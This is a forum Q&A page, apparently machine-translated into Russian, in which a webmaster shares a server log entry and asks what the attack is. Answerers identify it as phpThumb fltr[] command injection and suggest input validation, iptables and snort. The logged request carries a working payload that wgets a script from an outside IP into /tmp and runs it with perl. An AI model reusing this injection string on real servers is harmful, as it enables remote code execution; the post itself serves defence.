Question

Я получаю ошибки от злоумышленника, которому я верю ... что они пытаются сделать и как их остановить? Вот журнал:

Monday 26th of December 2011 12:10:18 PM
src=file.jpg&fltr[]=blur|
9%20-quality%20%2075%20interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 
91.121.133.22 
| 39757 
| /var/www/class.php 
| /class/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9

[src = file.jpg] - [fltr = Array] - [phpThumbDebug = 9] -

Я разделил области на новые строки. В основном это входные данные, а затем порт сервера, их IP-адрес, сценарий, к которому они обращались. определенно похоже, что они пытались использовать эксплойт для доступа к командной строке. но они думают, что это не тот сценарий.

stu · Answer 1 · 30 декабря 2011

Веб-серверы постоянно подвергаются атакам. Любая данная атака пытается отобрать определенную программу. Если вы хорошо пишете свое программное обеспечение и проверяете все свои входные данные, ваша система должна выдерживать подобный мусор и вежливо игнорировать его. Это не похоже на DOS-атаку, если это происходит только 3 раза в день. Если вы хотите сойти с ума, вы можете написать сценарий для сканирования журналов, если вы видите известный тип атаки, запустите сценарий, чтобы заблокировать доступ ip к вашему веб-серверу после N числа обращений.

CodeExpress · Answer 2 · 30 декабря 2011

Если все атаки происходят с одного и того же IP-адреса, вы можете использовать iptables, чтобы заблокировать доступ этого IP-адреса к вашему серверу. Вы можете сделать это временно или навсегда, написав сценарий. Это решение предполагает, что у вас есть права root / sudo на сервере, на котором вы размещаете. Вы также можете изучить snort, который довольно эффективен для известных (и распространенных) полезных нагрузок и строк эксплойтов.

В конце концов, ничто не сравнится с надежной проверкой ввода, когда речь идет о предотвращении распространенных сетевых атак!

Jeremy Harris · Answer 3 · 30 декабря 2011

Похоже, что есть эксплойт внедрения команды в параметре fltr [] phpThumb

http://www.securityfocus.com/bid/39605/exploit

http://www.juniper.net/security/auto/vulnerabilities/vuln39605.html

Я написал сценарий регистрации ошибок, который регистрирует все входы и другие вещи

Пожалуйста, войдите или зарегистрируйтесь чтобы ответить на этот вопрос.

Ответы [ 3 ]

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Я написал сценарий регистрации ошибок, который регистрирует все входы и другие вещи

Пожалуйста, войдите или зарегистрируйтесь чтобы ответить на этот вопрос.

Ответы [ 3 ]

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Нет похожих вопросов